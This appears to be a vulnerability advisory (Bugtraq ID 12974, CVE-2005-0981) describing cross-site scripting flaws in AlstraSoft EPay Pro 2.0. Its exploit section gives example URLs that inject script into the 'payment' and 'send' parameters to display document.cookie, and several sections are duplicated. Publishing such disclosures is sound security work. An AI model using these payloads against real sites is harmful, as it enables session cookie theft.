AlstraSoft EPay Pro Multiple Cross-Site Scripting Vulnerabilities
BID:12974
Info
AlstraSoft EPay Pro Multiple Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 12974 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-0981 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 01 2005 12:00AM |
| Updated: | Jul 12 2009 11:56AM |
| Credit: | Discovery is credited to Diabolic Crab dcrab <[email protected]>. |
| Vulnerable: |
AlstraSoft EPay Pro 2.0 |
| Not Vulnerable: | |
Discussion
AlstraSoft EPay Pro Multiple Cross-Site Scripting Vulnerabilities
It is reported that EPay Pro is affected by various cross-site scripting vulnerabilities.
These problems present themselves when malicious HTML and script code is sent to the application through multiple parameters.
This issue may allow for theft of cookie-based authentication credentials or other attacks.
EPay Pro version 2.0 is vulnerable to these issues.
It is reported that EPay Pro is affected by various cross-site scripting vulnerabilities.
These problems present themselves when malicious HTML and script code is sent to the application through multiple parameters.
This issue may allow for theft of cookie-based authentication credentials or other attacks.
EPay Pro version 2.0 is vulnerable to these issues.
Exploit / POC
AlstraSoft EPay Pro Multiple Cross-Site Scripting Vulnerabilities
An exploit is not required.
The following examples are available:
http://www.example.com/epal/?order_num=crap&payment=">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&send=first&send=regular&send=priority&send=express
Pops cookie
http://www.example.com/epal/?order_num=crap&payment=crap&send=first&send=regular&send=priority&send='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
An exploit is not required.
The following examples are available:
http://www.example.com/epal/?order_num=crap&payment=">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&send=first&send=regular&send=priority&send=express
Pops cookie
http://www.example.com/epal/?order_num=crap&payment=crap&send=first&send=regular&send=priority&send='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
Solution / Fix
AlstraSoft EPay Pro Multiple Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
AlstraSoft EPay Pro Multiple Cross-Site Scripting Vulnerabilities
References:
References: